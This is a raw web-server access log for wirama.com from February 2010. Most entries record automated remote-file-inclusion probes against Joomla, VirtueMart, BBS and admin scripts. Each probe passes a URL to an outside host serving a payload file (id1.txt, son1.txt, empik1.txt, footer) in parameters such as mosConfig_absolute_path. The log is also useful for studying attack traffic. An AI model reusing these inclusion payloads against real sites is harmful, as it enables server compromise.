62.141.56.136 - - [01/Feb/2010:08:56:56 -0800] "GET /logs/access_090801.log//com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
62.141.56.136 - - [01/Feb/2010:08:56:56 -0800] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:08:57:08 -0800] "GET /logs/access_091031.log/help.php?css_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
62.141.56.136 - - [01/Feb/2010:08:57:37 -0800] "GET /logs/access_100101.log//com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:08:58:14 -0800] "GET /support.php/admincp.php?rootpath=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:08:58:16 -0800] "GET /logs/access_090330.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:08:58:16 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:08:58:16 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:08:58:24 -0800] "GET /logs//support.php/admincp.php?rootpath=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:08:58:24 -0800] "GET /logs/access_091201.log//support.php/admincp.php?rootpath=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:08:58:54 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:08:58:54 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:08:58:54 -0800] "GET /logs/access_090330.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:09:00:32 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:09:00:32 -0800] "GET /logs/access_090330.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:09:00:32 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:09:00:55 -0800] "GET /support.php/admincp.php?rootpath=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:09:00:56 -0800] "GET /logs//support.php/admincp.php?rootpath=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:09:00:56 -0800] "GET /logs/access_091201.log//support.php/admincp.php?rootpath=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
62.141.56.136 - - [01/Feb/2010:09:03:32 -0800] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
62.141.56.136 - - [01/Feb/2010:09:03:32 -0800] "GET /logs/access_090801.log//com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
62.141.56.136 - - [01/Feb/2010:09:03:32 -0800] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:09:04:54 -0800] "GET /logs/access_091201.log/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:04:54 -0800] "GET /?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:04:54 -0800] "GET /logs/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
62.141.56.136 - - [01/Feb/2010:09:04:54 -0800] "GET /logs/access_090801.log%20%20//com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
62.141.56.136 - - [01/Feb/2010:09:04:54 -0800] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
62.141.56.136 - - [01/Feb/2010:09:04:54 -0800] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:09:05:00 -0800] "GET /logs/access_091201.log/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:05:00 -0800] "GET /?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:05:00 -0800] "GET /logs/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:05:44 -0800] "GET /?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:05:44 -0800] "GET /logs/access_091201.log/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:05:44 -0800] "GET /logs/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:05:54 -0800] "GET /?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:05:54 -0800] "GET /logs/access_091201.log/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:05:54 -0800] "GET /logs/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:06:23 -0800] "GET /?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:06:23 -0800] "GET /logs/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:06:23 -0800] "GET /logs/access_091201.log/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
116.40.122.117 - - [01/Feb/2010:09:06:33 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
116.40.122.117 - - [01/Feb/2010:09:06:33 -0800] "GET /logs/access_091101.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
116.40.122.117 - - [01/Feb/2010:09:06:33 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
116.40.122.117 - - [01/Feb/2010:09:07:10 -0800] "GET /logs/access_090801.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:07:16 -0800] "GET /logs/access_091201.log/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:07:16 -0800] "GET /logs/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:07:16 -0800] "GET /?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:07:24 -0800] "GET /logs/access_091201.log/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:07:24 -0800] "GET /?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:07:24 -0800] "GET /logs/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
220.80.108.81 - - [01/Feb/2010:09:07:33 -0800] "GET /logs/access_090801.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.80.108.81 - - [01/Feb/2010:09:07:33 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.80.108.81 - - [01/Feb/2010:09:07:33 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:09:08:01 -0800] "GET /logs/access_091201.log/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:08:01 -0800] "GET /logs/?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:09:08:01 -0800] "GET /?custompluginfile[]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
207.46.199.199 - - [01/Feb/2010:09:09:33 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.112 - - [01/Feb/2010:09:12:34 -0800] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
116.40.122.117 - - [01/Feb/2010:09:13:06 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
116.40.122.117 - - [01/Feb/2010:09:13:06 -0800] "GET /logs/access_090801.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
116.40.122.117 - - [01/Feb/2010:09:13:06 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:09:16:17 -0800] "GET /help.php?css_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:09:16:17 -0800] "GET /logs/help.php?css_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:09:16:19 -0800] "GET /logs/access_090329.log/help.php?css_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:09:18:11 -0800] "GET /logs/access_091031.log/help.php?css_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:09:20:58 -0800] "GET /logs/access_100101.log///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:03 -0800] "GET /logs///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:04 -0800] "GET /logs///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:04 -0800] "GET /logs/access_100101.log///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:08 -0800] "GET //zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:08 -0800] "GET //zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:09 -0800] "GET //zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:43 -0800] "GET /logs/access_100101.log///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:49 -0800] "GET //zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:49 -0800] "GET /logs///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:50 -0800] "GET //zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:52 -0800] "GET /logs///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:54 -0800] "GET //zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:54 -0800] "GET /logs///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:54 -0800] "GET /logs/access_100101.log///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:54 -0800] "GET /logs///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:54 -0800] "GET //zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:55 -0800] "GET /logs/access_100101.log///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:21:55 -0800] "GET /logs///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
116.40.122.117 - - [01/Feb/2010:09:22:18 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
116.40.122.117 - - [01/Feb/2010:09:22:18 -0800] "GET /logs/access_091101.log//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
116.40.122.117 - - [01/Feb/2010:09:22:19 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:09:24:21 -0800] "GET /logs///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:24:22 -0800] "GET //zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:24:22 -0800] "GET /logs///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:24:22 -0800] "GET /logs/access_100101.log///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:24:37 -0800] "GET /logs/access_091101.log///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:24:39 -0800] "GET /logs/access_091101.log///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:09:26:28 -0800] "GET /logs/access_090329.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:09:26:28 -0800] "GET /logs/access_090329.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:09:26:30 -0800] "GET /logs/access_090329.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:27:12 -0800] "GET /logs/access_100101.log///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:27:12 -0800] "GET /logs///zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:09:27:12 -0800] "GET //zae_plan/view_foot.php/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
116.40.122.117 - - [01/Feb/2010:09:30:32 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
116.40.122.117 - - [01/Feb/2010:09:30:33 -0800] "GET /logs/access_090801.log%20%20//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
116.40.122.117 - - [01/Feb/2010:09:30:34 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.195.112.29 - - [01/Feb/2010:09:31:14 -0800] "GET /logs/access_100101.log HTTP/1.0" 200 398966 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
66.15.62.24 - - [01/Feb/2010:09:34:14 -0800] "GET / HTTP/1.1" 200 916 "http://www.rfidupdate.com/articles/index.php?id=1542" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "www.wirama.com"
66.15.62.24 - - [01/Feb/2010:09:34:15 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "www.wirama.com"
66.15.62.24 - - [01/Feb/2010:09:34:18 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "www.wirama.com"
66.235.124.16 - - [01/Feb/2010:09:36:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.wirama.com"
66.235.124.16 - - [01/Feb/2010:09:36:35 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.wirama.com"
110.45.136.177 - - [01/Feb/2010:09:38:39 -0800] "GET /logs/access_090330.log//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
110.45.136.177 - - [01/Feb/2010:09:38:39 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
110.45.136.177 - - [01/Feb/2010:09:38:40 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
110.45.136.177 - - [01/Feb/2010:09:38:41 -0800] "GET /logs/access_090330.log//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
110.45.136.177 - - [01/Feb/2010:09:38:41 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
110.45.136.177 - - [01/Feb/2010:09:38:41 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.195.112.29 - - [01/Feb/2010:09:50:48 -0800] "GET /?D=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:09:53:49 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:09:53:49 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:09:53:49 -0800] "GET /logs/access_090330.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:09:54:12 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:09:54:12 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
207.46.199.200 - - [01/Feb/2010:09:54:16 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
